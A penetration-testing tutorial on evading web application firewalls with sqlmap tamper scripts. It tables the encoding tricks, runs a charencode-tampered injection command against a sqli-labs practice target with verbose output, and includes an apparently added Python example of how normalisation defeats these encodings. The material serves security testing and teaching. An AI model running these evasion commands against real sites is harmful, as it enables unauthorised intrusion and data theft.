Bypassing Web Application Firewall using Tamper Script via SQLMap

While attempting an injection through SQLMap, if you get an error like the one shown below (highlighted on my screen), do not panic.


This error may occur for 3 major reasons, which are as follows:

  1. The simplest one: the tested parameter does not appear to be injectable.
  2. The default tests were not thorough enough; this is easily fixed by increasing the values of --level and --risk.
  3. Some kind of protection mechanism (such as a WAF) is involved.

In this section, we will attempt to bypass the web application firewall using a tamper script.

The --tamper switch is used to evade simple filters and Web Application Firewalls (WAFs for short).

To list the Tamper scripts, run the following command on the terminal:

┌──(kali㉿kali)-[~]
└─$ sqlmap --list-tampers

These tamper scripts are a collection of built-in scripts that modify the injection vector used by SQLMap. For a better overview, I have listed them in tabular form:

Name                          Description
----------------------------  ------------------------------------------------------------------------
apostrophemask.py             Replaces the apostrophe character with its UTF-8 full-width counterpart.
apostrophenullencode.py       Replaces the apostrophe character with its illegal double Unicode counterpart.
appendnullbyte.py             Appends the encoded NULL byte character at the end of the payload.
base64encode.py               Base64-encodes all characters in a given payload.
between.py                    Replaces the greater-than operator (>) with NOT BETWEEN 0 AND #.
bluecoat.py                   Replaces the space character after an SQL statement with a valid random blank character; afterwards, replaces the character = with a LIKE operator.
chardoubleencode.py           Double URL-encodes all characters in a given payload (not processing those that are already encoded).
commalesslimit.py             Replaces instances like LIMIT M, N with LIMIT N OFFSET M.
commalessmid.py               Replaces instances like MID(A, B, C) with MID(A FROM B FOR C).
concat2concatws.py            Replaces instances like CONCAT(A, B) with CONCAT_WS(MID(CHAR(0), 0, 0), A, B).
charencode.py                 URL-encodes all characters in a given payload (not processing those already encoded).
charunicodeencode.py          Unicode-URL-encodes non-encoded characters in a given payload (not processing those already encoded).
equaltolike.py                Replaces all occurrences of the equals operator (=) with the LIKE operator.
escapequotes.py               Slash-escapes quotes (' and ").
greatest.py                   Replaces the greater-than operator (>) with its GREATEST counterpart.
halfversionedmorekeywords.py  Adds a versioned MySQL comment before each keyword.
ifnull2ifisnull.py            Replaces instances like IFNULL(A, B) with IF(ISNULL(A), B, A).
modsecurityversioned.py       Embraces the complete query with a versioned comment.
modsecurityzeroversioned.py   Embraces the complete query with a zero-versioned comment.
multiplespaces.py             Adds multiple spaces around SQL keywords.
nonrecursivereplacement.py    Replaces predefined SQL keywords with representations suitable for defeating non-recursive replacement filters (such as replace("SELECT", "")).
percentage.py                 Adds a percentage sign (%) in front of each character.
overlongutf8.py               Converts all (non-alphanumeric) characters in a given payload to overlong UTF-8 (not processing those already encoded).
randomcase.py                 Replaces each keyword character with a random-case value.
randomcomments.py             Adds random comments to SQL keywords.
securesphere.py               Appends a specially crafted string.
sp_password.py                Appends sp_password to the end of the payload for automatic obfuscation from the DBMS logs.
space2comment.py              Replaces the space character (' ') with comments (/**/).
space2dash.py                 Replaces the space character (' ') with a dash comment (--) followed by a random string and a new line (\n).
space2hash.py                 Replaces the space character (' ') with a pound character (#) followed by a random string and a new line (\n).
space2morehash.py             Replaces the space character (' ') with a pound character (#) followed by a random string and a new line (\n).
space2mssqlblank.py           Replaces the space character (' ') with a random blank character from a valid set of alternate characters.
space2mssqlhash.py            Replaces the space character (' ') with a pound character (#) followed by a new line (\n).
space2mysqlblank.py           Replaces the space character (' ') with a random blank character from a valid set of alternate characters.
space2mysqldash.py            Replaces the space character (' ') with a dash comment (--) followed by a new line (\n).
space2plus.py                 Replaces the space character (' ') with a plus (+).
space2randomblank.py          Replaces the space character (' ') with a random blank character from a valid set of alternate characters.
symboliclogical.py            Replaces the AND and OR logical operators with their symbolic counterparts (&& and ||).
unionalltounion.py            Replaces UNION ALL SELECT with UNION SELECT.
unmagicquotes.py              Replaces the quote character (') with a multibyte combo %bf%27 together with a generic comment at the end (to make it work).
uppercase.py                  Replaces each keyword character with an upper-case value.
varnish.py                    Appends an HTTP header X-originating-IP.
versionedkeywords.py          Encloses each non-function keyword with a versioned MySQL comment.
versionedmorekeywords.py      Encloses each keyword with a versioned MySQL comment.
xforwardedfor.py              Appends a fake HTTP header X-Forwarded-For.

Let's try and run one of the scripts, charencode.py, which URL-encodes every character of the payload (a space, for example, becomes %20).

To use the tamper mechanism, we'll pass the --tamper switch with the name of the script, which in this case is charencode. For better results, I add the --level switch with a value of 2 and --risk with a value of 2.

We'll also use the -v 4 verbosity level to actually see the payload as modified by the tamper script, as follows:

┌──(kali㉿kali)-[~]
└─$ sqlmap -u http://192.168.56.112/sqli-labs-master/Less-30/?id=1 --level 2 --risk 2 --tamper=charencode.py -v 4

The output is shown below:

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.7#stable}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:26:59 /2022-12-20/

[01:26:59] [DEBUG] cleaning up configuration parameters
[01:26:59] [INFO] loading tamper module 'charencode'
[01:26:59] [DEBUG] setting the HTTP timeout
[01:26:59] [DEBUG] setting the HTTP User-Agent header
[01:26:59] [DEBUG] creating HTTP requests opener object
[01:26:59] [INFO] testing connection to the target URL
[01:26:59] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs-master/Less-30/?id=1 HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.6.7#stable (https://sqlmap.org)
Host: 192.168.56.112
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

[01:26:59] [DEBUG] declared web page charset 'utf-8'
[01:27:00] [INFO] testing if the target URL content is stable
[01:27:00] [TRAFFIC OUT] HTTP request [#2]:
GET /sqli-labs-master/Less-30/?id=1 HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.6.7#stable (https://sqlmap.org)
Host: 192.168.56.112
Accept: */*
Accept-encoding: gzip,deflate
Connection: close
<SNIP>

As you can see, the data in the payload sections of the output is URL-encoded, as specified by the charencode.py tamper script.
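To make the charencode transformation concrete, and to show what a filter on the receiving end has to do to see through it, here is an added Python example that is not part of the original post or of sqlmap itself. It reimplements the charencode and chardoubleencode transformations from the table above on a constructed probe string, then applies a trivial tautology signature both to the raw wire form and after a bounded URL-decode and comment-stripping normalisation step; the signature, the probe string and the function names are all constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed probe string (not from the page), used only for the demonstration.
PAYLOAD = "1' AND 1=1-- -"

# Trivial tautology signature of the kind a naive filter would match.
SIG = re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.IGNORECASE)


def charencode(payload):
    """Same transformation charencode.py applies: percent-encode every
    character except %XX sequences that are already encoded."""
    out, i = [], 0
    while i < len(payload):
        if payload[i] == "%" and re.match(r"%[0-9A-Fa-f]{2}", payload[i:i + 3]):
            out.append(payload[i:i + 3])
            i += 3
        else:
            out.append("%%%02X" % ord(payload[i]))
            i += 1
    return "".join(out)


def chardoubleencode(payload):
    """Equivalent of chardoubleencode.py: a second encoding layer (%25XX)."""
    return charencode(payload).replace("%", "%25")


def normalize(value, max_rounds=3):
    """Defender-side canonicalisation: URL-decode until the value is stable
    (bounded, so nested encoding cannot loop forever), treat '+' as a space,
    strip inline /**/ comments, collapse whitespace and fold case."""
    prev, rounds = None, 0
    while value != prev and rounds < max_rounds:
        prev, value, rounds = value, unquote_plus(value), rounds + 1
    value = re.sub(r"/\*.*?\*/", " ", value)
    value = re.sub(r"\s+", " ", value)
    return value.strip().lower()


def matches_raw(value):
    """Signature on the wire form: evaded by charencode, space2plus, space2comment."""
    return bool(SIG.search(value))


def matches_normalized(value):
    """Same signature after normalisation: the encoding trick no longer matters."""
    return bool(SIG.search(normalize(value)))
```

The same normalisation also neutralises the space2plus and space2comment outputs from the table, which is the practical point: a filter that matches before decoding and comment stripping is what these scripts are built to evade.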

Tamper scripts are experimental and should be used sparingly; sometimes they do not work as expected, but they can be useful for evasion.
